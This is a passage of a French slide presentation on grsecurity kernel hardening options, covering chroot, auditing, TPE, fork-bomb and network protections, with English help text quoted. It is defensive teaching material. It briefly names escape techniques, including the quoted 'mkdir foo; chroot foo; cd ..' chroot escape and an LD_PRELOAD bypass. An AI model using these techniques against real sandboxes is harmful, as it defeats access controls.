processus soit la racine de la cage Empêche l'évasion de la cage par getcwd / fchdir en forçant le répertoire de travail à être la racine de la cage Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, the current working directory of all newly-chrooted %% applications will be set to the the root directory of the chroot. %% The man page on chroot(2) states: %% Note that this call does not change the current working %% directory, so that `.' can be outside the tree rooted at %% `/'. In particular, the super-user can escape from a %% `chroot jail' by doing `mkdir foo; chroot foo; cd ..'. %% It is recommended that you say Y here, since it's not known to break %% any software. If the sysctl option is enabled, a sysctl option with %% name "chroot_enforce_chdir" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny (f)chmod +s %font "code" CONFIG_GRKERNSEC_CHROOT_CHMOD %font "standard" Les processus en cage ne peuvent pas ajouter un bit suid/sgid via chmod() ou fchmod() Les bits suid/sgid n'ont pas de raison d'être dans un environnement restreint Pour empécher les escalades de privilèges par des processus restreints ou qu'un processus non privilégié et non restreint obtienne des privilèges de la part d'un processus privilégié mais restreint Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be able to chmod %% or fchmod files to make them have suid or sgid bits. This protects %% against another published method of breaking a chroot. If the sysctl %% option is enabled, a sysctl option with name "chroot_deny_chmod" is %% created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny mknod %font "code" CONFIG_GRKERNSEC_CHROOT_MKNOD %font "standard" Les processus en cage ne peuvent pas appeler mknod() Empêche l'évasion de la cage par accès direct à des périphériques via création de fichiers spéciaux en mode block ou caractère Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be allowed to %% mknod. The problem with using mknod inside a chroot is that it %% would allow an attacker to create a device entry that is the same %% as one on the physical root of your system, which could range from %% anyhing from the console device to a device for your harddrive (which %% they could then use to wipe the drive or steal data). It is recommended %% that you say Y here, unless you run into software incompatibilities. %% If the sysctl option is enabled, a sysctl option with name %% "chroot_deny_mknod" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny ptraces %font "code" CONFIG_GRKERNSEC_CHROOT_PTRACE %font "standard" Les processus en cage ne peuvent pas appeler ptrace() Empêche l'évasion de la cage par débogage de processus hors de la cage Les processus dans des environnements restreints n'ont pas de raison de déboguer d'autres processus surtout si ces derniers ne sont pas restreints Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be able to ptrace %% other processes. Ptracing a process allows one to attach and alter the %% flow of execution for the process. It is strongly recommended that you %% say Y here. If the sysctl option is enabled, a sysctl option with name %% "chroot_deny_ptrace" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Restrict priority changes %font "code" CONFIG_GRKERNSEC_CHROOT_NICE %font "standard" Les processus en cage ne peuvent pas appeler nice() pour augmenter leur priorité Empêche les dénis de service par consommation de ressources processeur Nécessite "Chroot jail restrictions" %cont, font "code" CONFIG_GRKERNSEC_CHROOT %font "standard" %%%font "code" %% If you say Y here, processes inside a chroot will not be able to raise %% the priority of processes in the chroot, or alter the priority of %% processes outside the chroot. This provides more security than simply %% removing CAP_SYS_NICE from the process' capability set. If the %% sysctl option is enabled, a sysctl option with name "chroot_restrict_nice" %% is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Capability restrictions within chroot %font "code" CONFIG_GRKERNSEC_CHROOT_CAPS %font "standard" Limite les privilèges des processus mis en cage pour leur interdire d'insérer des modules : %cont, font "code" CAP_SYS_MODULE %cont, font "standard" d'ouvrir des périphériques raw : %cont, font "code" CAP_SYS_RAWIO %cont, font "standard" d'effectuer des tâches d'administration système et réseau : %cont, font "code" CAP_SYS_ADMIN %cont, font "standard" de transférer des privilèges : %cont, font "code" CAP_SETPCAP %cont, font "standard" et de configurer des tty : %cont, font "code" CAP_SYS_TTY_CONFIG %cont, font "standard" Les processus dans des environnements restreints n'ont pas de raison d'effectuer ce type de tâches %%%font "code" %% If you say Y here, the capabilities on all root processes within a %% chroot jail will be lowered to stop module insertion, raw i/o, %% system and net admin tasks, transferring capabilities, and %% tty configuration tasks. This is left an option because it breaks %% some apps. Disable this if your chrooted apps are having %% problems performing those kinds of tasks. If the sysctl option is %% enabled, a sysctl option with name "chroot_caps" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Secure keymap loading %font "code" CONFIG_GRKERNSEC_KBMAP %font "standard" Limite à root le changement des touches et des touches de fonctions du clavier %%%font "code" %% If you say Y here, KDSKBENT and KDSKBSENT ioctl calls being %% called by unprivileged users will be denied. If you answer N, %% everyone with access to the console will be able to modify keyboard %% bindings. If the sysctl option is enabled, a sysctl option with name %% "secure_kbmap" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 4/8 %cont, fore "grey40" Buffer Overflow Protection %cont, fore "grey60" Access Control Lists %cont, fore "grey80" Filesystem Protections %cont, fore "green" Kernel Auditing Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Single group for auditing %font "code" CONFIG_GRKERNSEC_AUDIT_GROUP %font "standard" Limite la journalisation des appels exec, chdir, (un)mount, et ipc à un groupe Empêche des possibilités de dénis de services via consommation de ressources par le système de journalisation Nécessite que les processus et utilisateurs à surveiller soient dans un même groupe à spécifier %%%font "code" %% If you say Y here, the exec, chdir, (un)mount, and ipc logging features %% will only operate on a group you specify. This option is recommended %% if you only want to watch certain users instead of having a large %% amount of logs from the entire system. If the sysctl option is enabled, %% a sysctl option with name "audit_group" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID for auditing %font "code" CONFIG_GRKERNSEC_AUDIT_GID 1007 %font "standard" Le groupe pour lequel les appels exec, chdir, (un)mount, et ipc sont journalisés Nécessite "Single group for auditing" %cont, font "code" CONFIG_GRKERNSEC_AUDIT_GROUP %font "standard" %%%font "code" %% Here you can choose the GID that will be the target of kernel auditing. %% Remember to add the users you want to log to the GID specified here. %% If the sysctl option is enabled, whatever you choose here won't matter. %% You'll have to specify the GID in your bootup script by echoing the GID %% to the proper /proc entry. View the help on the sysctl option for more %% information. If the sysctl option is enabled, a sysctl option with name %% "audit_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Exec logging %font "code" CONFIG_GRKERNSEC_EXECLOG %font "standard" Active la journalisation des appels à execve() Limité à un groupe si "Single group for auditing" %cont, font "code" CONFIG_GRKERNSEC_AUDIT_GROUP %cont, font "standard", fore "white", size 4 est activé %%%font "code" %% If you say Y here, all execve() calls will be logged (since the %% other exec*() calls are frontends to execve(), all execution %% will be logged). Useful for shell-servers that like to keep track %% of their users. If the sysctl option is enabled, a sysctl option with %% name "exec_logging" is created. %% WARNING: This option when enabled will produce a LOT of logs, especially %% on an active system. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Log execs within chroot %font "code" CONFIG_GRKERNSEC_CHROOT_EXECLOG %font "standard" Journalise tous les appels à execve() effectués par les processus mis en cage %%%font "code" %% If you say Y here, all executions inside a chroot jail will be logged %% to syslog. If the sysctl option is enabled, a sysctl option with name %% "chroot_execlog" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Chdir logging %font "code" CONFIG_GRKERNSEC_AUDIT_CHDIR %font "standard" Active la journalisation des appels à chdir() Limité à un groupe si "Single group for auditing" %cont, font "code" CONFIG_GRKERNSEC_AUDIT_GROUP %cont, font "standard", fore "white", size 4 est activé %%%font "code" %% If you say Y here, all chdir() calls will be logged. If the sysctl %% option is enabled, a sysctl option with name "audit_chdir" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page (Un)Mount logging %font "code" CONFIG_GRKERNSEC_AUDIT_MOUNT %font "standard" Active la journalisation des mountages et démontages de partitions Limité à un groupe si "Single group for auditing" %cont, font "code" CONFIG_GRKERNSEC_AUDIT_GROUP %cont, font "standard", fore "white", size 4 est activé %%%font "code" %% If you say Y here, all mounts and unmounts will be logged. If the %% sysctl option is enabled, a sysctl option with name "audit_mount" is %% created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page IPC logging %font "code" CONFIG_GRKERNSEC_AUDIT_IPC %font "standard" Active la journalisation des créations et destructions des queues de messages des sémaphores des segments de mémoire partagés Limité à un groupe si "Single group for auditing" %cont, font "code" CONFIG_GRKERNSEC_AUDIT_GROUP %cont, font "standard", fore "white", size 4 est activé %%%font "code" %% If you say Y here, creation and removal of message queues, semaphores, %% and shared memory will be logged. If the sysctl option is enabled, a %% sysctl option with name "audit_ipc" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Signal logging %font "code" CONFIG_GRKERNSEC_SIGNAL %font "standard" Journalise certains signaux importants comme SIGSEGV ceci indique quand un programme fonctionne mal ceci peut indiquer des tentatives infructueuses d'exploitation d'une vulnérabilité %%%font "code" %% If you say Y here, certain important signals will be logged, such as %% SIGSEGV, which will as a result inform you of when a error in a program %% occurred, which in some cases could mean a possible exploit attempt. %% If the sysctl option is enabled, a sysctl option with name %% "signal_logging" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Fork failure logging %font "code" CONFIG_GRKERNSEC_FORKFAIL %font "standard" Journalise les appels à fork() qui ont échoué Ceci peut indiquer une tentative de déni de service contre le système par fork-bombing de dépassement de quota %%%font "code" %% If you say Y here, all failed fork() attempts will be logged. %% This could suggest a fork bomb, or someone attempting to overstep %% their process limit. If the sysctl option is enabled, a sysctl option %% with name "forkfail_logging" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Set*id logging %font "code" CONFIG_GRKERNSEC_SUID %font "standard" Active la journalisation des appels à set*id() Peut générer beaucoup d'évènements sur certains systèmes chargés Cela dépend du comportement normal des applications Ne peut être sélectionné si "Log set*ids to root" l'est %%%font "code" %% If you say Y here, all set*id() calls will be logged. Such information %% could be useful when detecting a possible intrusion attempt. This %% option can produce a lot of logs on an active system. If the sysctl %% option is enabled, a sysctl option with name "suid_logging" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Log set*ids to root %font "code" CONFIG_GRKERNSEC_SUID_ROOT %font "standard" Ne journalise que les appels à set*id() ou un utilisateur demande un changement vers l'utilisateur ou le groupe root Peut indiquer une exploitation de vulnérabilité les shellcode commencent généralement par setreuid() car /bin/bash2 se débarasse de ses privilèges si le groupe et/ou l'utilisateur effectifs sont différents du groupe et/ou de l'utilisateur réel voir l'option -p de bash(1) v2.x car tcsh refuse de s'exécuter dans le même cas Ne peut être sélectionné si "Set*id logging" l'est %%%font "code" %% If you say Y here, only set*id() calls where a user is changing to the %% gid or uid of the root user will be logged. Such information %% could be useful when detecting a possible intrusion attempt. This %% option will produce less logs than logging all calls. If the sysctl %% option is enabled, a sysctl option with name "suid_root_logging" is %% created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Time change logging %font "code" CONFIG_GRKERNSEC_TIME %font "standard" Journalise tous les changements de l'horloge système %%%font "code" %% If you say Y here, any changes of the system clock will be logged. %% If the sysctl option is enabled, a sysctl option with name %% "timechange_logging" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 5/8 %cont, fore "grey40" Buffer Overflow Protection %cont, fore "grey40" Access Control Lists %cont, fore "grey60" Filesystem Protections %cont, fore "grey80" Kernel Auditing %cont, fore "green" Executable Protections Network Protections Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Exec process limiting %font "code" CONFIG_GRKERNSEC_EXECVE %font "standard" Les limites en ressources sont également vérifiées lors de execve() Normalement ceci n'est fait que lors de fork() Permet d'empécher des contournements de limitations de ressources %%%font "code" %% If you say Y here, users with a resource limit on processes will %% have the value checked during execve() calls. The current system %% only checks the system limit during fork() calls. If the sysctl option %% is enabled, a sysctl option with name "execve_limiting" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Randomized PIDs %font "code" CONFIG_GRKERNSEC_RANDPID %font "standard" Permet de rendre aléatoire la génération des numéros de processus Permet de rendre plus complexes les attaques par signaux par débogage les numéros de processus des démons lancés au démarrage étant aléatoires %%%font "code" %% If you say Y here, all PIDs created on the system will be %% pseudo-randomly generated. This is extremely effective along %% with the /proc restrictions to disallow an attacker from guessing %% pids of daemons, etc. PIDs are also used in some cases as part %% of a naming system for temporary files, so this option would keep %% those filenames from being predicted as well. We also use code %% to make sure that PID numbers aren't reused too soon. If the sysctl %% option is enabled, a sysctl option with name "rand_pids" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Altered default IPC permissions %font "code" CONFIG_GRKERNSEC_IPC %font "standard" Restreint les permissions par défaut à la création des segments de mémoire partagés d'après le masque de l'utilisateur (umask) quand l'utilisateur ne les spécifie pas Les droits d'accès par défaut sont ugo+rwx sous linux %%%font "code" %% If you say Y here, the default permissions for IPC objects will be %% set based on the filesystem umask of the user creating the object. %% By default linux sets the permissions to ugo+rwx, which can be %% a security problem if the application doesn't explicitly set the %% permissions of the IPC object. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Limit uid/gid changes to root %font "code" CONFIG_GRKERNSEC_TTYROOT %font "standard" Permet d'accéder à des options de limitation d'accès de root sur différents types de consoles %%%font "code" %% If you say Y here, you will be able choose from three option that %% will allow you to restrict access to the root account by console %% type. These options should only be enabled if you are sure of what %% you're doing. Also note that they only apply to processes that have %% ttys, which generally involves some kind of user-interaction. The %% options are basically in place to keep users on a system who have a %% (stolen) password for root from using it unless their console %% credentials match. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny physical consoles (tty) %font "code" CONFIG_GRKERNSEC_TTYROOT_PHYS %font "standard" Interdit l'accès de root sur les consoles physiques Nécessite "Limit uid/gid changes to root" %cont, font "code" CONFIG_GRKERNSEC_TTYROOT %font "standard" %%%font "code" %% If you say Y here, access to root from physical consoles will be %% denied. This is only recommended for rare cases where you will %% never need to be physically at the machine. If the sysctl option %% is enabled, a sysctl option with name "deny_phys_root" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny serial consoles (ttyS) %font "code" CONFIG_GRKERNSEC_TTYROOT_SERIAL %font "standard" Interdit l'accès de root sur les consoles séries Nécessite "Limit uid/gid changes to root" %cont, font "code" CONFIG_GRKERNSEC_TTYROOT %font "standard" %%%font "code" %% If you say Y here, access to root from serial consoles will be %% denied. Most people can say Y here, since most don't use serial %% devices for their console access. If you are unsure, say N. If %% the sysctl option is enabled, a sysctl option with name %% "deny_serial_root" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Deny pseudo consoles (pty) %font "code" CONFIG_GRKERNSEC_TTYROOT_PSEUDO %font "standard" Interdit l'accès de root sur les pseudo consoles Nécessite "Limit uid/gid changes to root" %cont, font "code" CONFIG_GRKERNSEC_TTYROOT %font "standard" %%%font "code" %% If you say Y here, access to root from pseudo consoles will be %% denied. Pseudo consoles include consoles from telnet, ssh, or any other %% kind of interactive shell initiated from the network. Pseudo consoles %% also include any terminals you use in XFree86. If you will only be %% accessing the machine for root access from the physical console, you %% can say Y here. Only say Y here if you're sure of what you're doing. %% If the sysctl option is enabled, a sysctl option with name %% "deny_pseudo_root" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Fork-bomb protection %font "code" CONFIG_GRKERNSEC_FORKBOMB %font "standard" Limite pour les utilisateurs du groupe spécifié Le nombre total de processus autorisés Le nombre de nouveaux processus par seconde autorisé Empêche les attaques en déni de service par fork-bombing %%%font "code" %% If you say Y here, you will be able to configure a group to add to users %% on your system that you want to be unable to fork-bomb the system. %% You will be able to specify a maximum process limit for the user and %% set a rate limit for all forks under their uid. (Fork-bombing is a %% tactic used by attackers that can be enacted in two ways, (1) loading %% up thousands of processes until the system can't take any more (this %% method can be stopped outside of the kernel with PAM, however we place %% protection for it in the kernel to be more complete and reduce overhead), %% and (2), by forking processes at a rapid rate, and then killing them %% off, which cannot be protected against in the same way at tactic 1) %% The rate limit is specified in forks allowed per second. Set this %% limit low enough to stop tactic 2, but high enough to allow for %% normal operation. The protection will kill the offending process. %% If the sysctl option is enabled, a sysctl option with name %% "fork_bomb_prot" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID for restricted users %font "code" CONFIG_GRKERNSEC_FORKBOMB_GID 1006 %font "standard" Le groupe auquel appartiennent les utilisateurs limités Nécessite "Fork-bomb protection" %cont, font "code" CONFIG_GRKERNSEC_FORKBOMB %font "standard" %%%font "code" %% Here you can choose the GID to enable fork-bomb protection for. %% Remember to add the users you want protection enabled for to the GID %% specified here. If the sysctl option is enabled, whatever you choose %% here won't matter. You'll have to specify the GID in your bootup %% script by echoing the GID to the proper /proc entry. View the help %% on the sysctl option for more information. If the sysctl option is %% enabled, a sysctl option with name "fork_bomb_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Forks allowed per second %font "code" CONFIG_GRKERNSEC_FORKBOMB_SEC 40 %font "standard" Nombre maximal de fork() par seconde pour un utilisateur limité Nécessite "Fork-bomb protection" %cont, font "code" CONFIG_GRKERNSEC_FORKBOMB %font "standard" %%%font "code" %% Here you can specify the maximum number of forks allowed per second. %% You don't want to set this value too low, or else you'll hinder %% normal operation of your system. The default value should be fine for %% most users. If the sysctl option is enabled, a sysctl option with name %% "fork_bomb_sec" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Maximum processes allowed %font "code" CONFIG_GRKERNSEC_FORKBOMB_MAX 20 %font "standard" Nombre maximal de processus pour un utilisateur limité Nécessite "Fork-bomb protection" %cont, font "code" CONFIG_GRKERNSEC_FORKBOMB %font "standard" %%%font "code" %% Here you can configure the maximum number of processes users in the %% fork-bomb protected group can run. I would not recommend setting a %% value lower than 8, since some programs like man(1) spawn up to 8 %% processes to run. The default value should be fine for most purposes. %% If the sysctl option is enabled, a sysctl option with name %% "fork_bomb_max" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Trusted path execution %font "code" CONFIG_GRKERNSEC_TPE %font "standard" Permet d'interdire l'exécution de programmes qui ne se trouvent pas dans un répertoire de confiance Permet d'interdire l'exécution de tout programme importé par un utilisateur Empêche l'exécution d'exploitations de vulnérabilités locales Inutile si un interpréteur comme perl est présent car il est alors toujours possible de porter l'exploit en perl %%%font "code" %% If you say Y here, you will be able to choose a gid to add to the %% supplementary groups of users you want to mark as "untrusted." %% These users will not be able to execute any files that are not in %% root-owned directories writeable only by root. If the sysctl option %% is enabled, a sysctl option with name "tpe" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Glibc protection %font "code" CONFIG_GRKERNSEC_TPE_GLIBC %font "standard" Empêche l'exécution de programme lorsque certaines variables d'environnement sont définies LD_PRELOAD /lib/ld-2.* Ces variables changent le comportement du programme /lib/ld-2.* ce programme est utilisé par tous les programmes liés dynamiquement pour charger les bibliothèques dynamiques ces variables permettent donc de contourner la protection par répertoire de confiance Nécessite "Trusted path execution" %cont, font "code" CONFIG_GRKERNSEC_TPE %font "standard" %%%font "code" %% If you say Y here, all non-root users will not be able to execute %% any files while glibc specific environment variables such as %% LD_PRELOAD are set, which could be used to evade the trusted path %% execution protection. It also protects against evasion through %% /lib/ld-2.* It is recommended you say Y here also. If the sysctl option %% is enabled, a sysctl option with name "tpe_glibc" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Partially restrict non-root users %font "code" CONFIG_GRKERNSEC_TPE_ALL %font "standard" Permet d'autoriser aux autres utilisateurs d'exécuter des programmes si ces programmes sont dans des répertoires qui appartiennent à l'utilisateur ce répertoire n'est en écriture que pour l'utilisateur Autorise un utilisateur à exécuter ses propres programmes Empèche un attaquant de faire exécuter à un utilisateur victime un programme potentiellement malveillant Nécessite "Trusted path execution" %cont, font "code" CONFIG_GRKERNSEC_TPE %font "standard" %%%font "code" %% If you say Y here, All other non-root users will only be allowed to %% execute files in directories they own that are not group or %% world-writeable, or in directories owned by root and writeable only by %% root. If the sysctl option is enabled, a sysctl option with name %% "tpe_restrict_all" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID for untrusted users %font "code" CONFIG_GRKERNSEC_TPE_GID 1005 %font "standard" Permet de limiter l'interdiction d'exécuter un programme qui ne se trouve pas dans un répertoire de confiance à un groupe donné Nécessite "Trusted path execution" %cont, font "code" CONFIG_GRKERNSEC_TPE %font "standard" %%%font "code" %% Here you can choose the GID to enable trusted path protection for. %% Remember to add the users you want protection enabled for to the GID %% specified here. If the sysctl option is enabled, whatever you choose %% here won't matter. You'll have to specify the GID in your bootup %% script by echoing the GID to the proper /proc entry. View the help %% on the sysctl option for more information. If the sysctl option is %% enabled, a sysctl option with name "tpe_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Restricted ptrace %font "code" CONFIG_GRKERNSEC_PTRACE %font "standard" Limite l'appel à ptrace() à root le traçage des appels systèmes dans le noyau est aussi désactivé les appels ptrace() autorisés sont journalisés L'appel ptrace() est inutilisé sur de très nombreux système Empêche le vol d'informations dans d'autres processus le changement de l'exécution d'autres processus %%%font "code" %% If you say Y here, no one but root will be able to ptrace processes. %% Tracing syscalls inside the kernel will also be disabled. All allowed %% ptraces will be logged when this option is enabled. If the sysctl %% option is enabled, a sysctl option with name "restrict_ptrace" is %% created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Allow ptrace for group %font "code" CONFIG_GRKERNSEC_PTRACE_GROUP %font "standard" Permet d'autoriser un groupe à appeler ptrace() Nécessite "Restricted ptrace" %cont, font "code" CONFIG_GRKERNSEC_PTRACE %font "standard" %%%font "code" %% If you say Y here, you will be able to choose a GID of whose users %% will be able to ptrace. If the sysctl option is enabled, a sysctl %% option with name "allow_ptrace_group" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page GID for ptrace %font "code" CONFIG_GRKERNSEC_PTRACE_GID 1008 %font "standard" Permet de spécifier le groupe autorisé à appeler ptrace() Nécessite "Restricted ptrace" %cont, font "code" CONFIG_GRKERNSEC_PTRACE %font "standard" %%%font "code" %% Here you can choose the GID of whose users will be able to ptrace. %% Remember to add the users you want ptrace enabled for to the GID %% specified here. If the sysctl option is enabled, whatever you choose %% here won't matter. You'll have to specify the GID in your bootup %% script by echoing the GID to the proper /proc entry. View the help %% on the sysctl option for more information. If the sysctl option is %% enabled, a sysctl option with name "ptrace_gid" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Groupe d'options 6/8 %cont, fore "grey40" Buffer Overflow Protection %cont, fore "grey40" Access Control Lists %cont, fore "grey40" Filesystem Protections %cont, fore "grey60" Kernel Auditing %cont, fore "grey80" Executable Protections %cont, fore "green" Network Protections Sysctl support Miscellaneous Enhancements %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Randomized IP IDs %font "code" CONFIG_GRKERNSEC_RANDID %font "standard" Permet de rendre totalement aléatoire la génération des numéros id des paquets ip C'est le portage de la fonction de génération de OpenBSD Pas très utile la fonction par défaut initialise à zéro le champ ID pour les paquets avec le bit DF donc pour les paquets syn/ack et rst tcp, udp courts %%%font "code" %% If you say Y here, all the id field on all outgoing packets %% will be randomized. This hinders os fingerprinters and %% keeps your machine from being used as a bounce for an untraceable %% portscan. Ids are used for fragmented packets, fragments belonging %% to the same packet have the same id. By default linux only %% increments the id value on each packet sent to an individual host. %% We use a port of the OpenBSD random ip id code to achieve the %% randomness, while keeping the possibility of id duplicates to %% near none. If the sysctl option is enabled, a sysctl option with name %% "rand_ip_ids" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Randomized TCP source ports %font "code" CONFIG_GRKERNSEC_RANDSRC %font "standard" Permet de rendre totalement aléatoire le numéro de port source généré par le noyau Permet de rendre plus complexe des attaques de vols de données contre des protocoles comme ftp passif %%%font "code" %% If you say Y here, situations where a source port is generated on the %% fly for the TCP protocol (ie. with connect() ) will be altered so that %% the source port is generated at random, instead of a simple incrementing %% algorithm. If the sysctl option is enabled, a sysctl option with name %% "rand_tcp_src_ports" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Altered Ping IDs %font "code" CONFIG_GRKERNSEC_RANDPING %font "standard" Le champ icmp.id des paquets icmp echo reply générés est identique au champ icmp.id des paquets icmp echo request reçus Permet de rendre plus complexe l'identification à distance de la pile IP %%%font "code" %% If you say Y here, the way Linux handles echo replies will be changed %% so that the reply uses an ID equal to the ID of the echo request. %% This will help in confusing OS detection. If the sysctl option is %% enabled, a sysctl option with name "altered_pings" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Randomized TTL %font "code" CONFIG_GRKERNSEC_RANDTTL %font "standard" Permet de rendre totalement aléatoire le champ TTL des paquets IP générés Permet de rendre plus complexe l'identification à distance de la pile IP Redessiner l'architecture d'accès n'est pas complexifié %%%font "code" %% If you say Y here, your TTL (time to live) for packets will be set at %% random, with a base level you specify, to further confuse OS detection. %% If the sysctl option is enabled, a sysctl option with name "rand_ttl" %% is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page TTL starting point %font "code" CONFIG_GRKERNSEC_RANDTTL_THRESH 64 %font "standard" Permet de choisir la plus petite valeur de champ TTL à générer Nécessite "Randomized TTL" %cont, font "code" CONFIG_GRKERNSEC_RANDTTL %font "standard" %%%font "code" %% Here you can choose a base TTL for the randomization. The default value %% for this setting is the Linux default TTL. Most users will want to %% leave this setting as-is. The higher you set the base level (note that %% you can't set it above 255) the more hops your packets will live. %% If the sysctl option is enabled, whatever you choose here won't matter. %% You'll have to specify the threshold in your bootup script by echoing %% the threshold to the proper /proc entry. View the help on the sysctl %% option for more information. If the sysctl option is enabled, a sysctl %% option with name "rand_ttl_thresh" is created. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %page Socket restrictions %font "code" CONFIG_GRKERNSEC_SOCKET %font "standard" Permet 